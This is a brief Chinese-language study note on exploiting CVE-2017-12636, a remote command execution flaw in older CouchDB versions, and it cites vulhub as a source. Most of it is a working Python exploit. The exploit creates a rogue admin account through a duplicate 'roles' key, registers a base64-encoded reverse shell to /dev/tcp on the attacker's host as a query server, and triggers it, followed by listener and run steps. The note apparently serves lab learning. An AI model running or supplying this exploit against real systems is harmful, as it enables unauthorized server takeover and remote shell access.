【笔记】CVE-2017-12636漏洞利用

前言

CouchDB任意命令执行漏洞

漏洞利用前提

• CouchDB 1.x（<1.7.0）
• CouchDB 2.x（<2.1.1）

exp

<ip_remote>：受害者IP地址
5984：受害者端口号
<ip_local>：攻击者IP地址
<port_local>：攻击者端口号

exp.py

import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://<ip_remote>:5984'
command = rb"""sh -i >& /dev/tcp/<ip_local>/<port_local> 0>&1"""
version = 1

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

• 开启反弹Shell监听

nv -lvp <port_local>

• 运行exp

python3 exp.py

完成

参考文献

哔哩哔哩——xiaodisec
vulhub/vulhub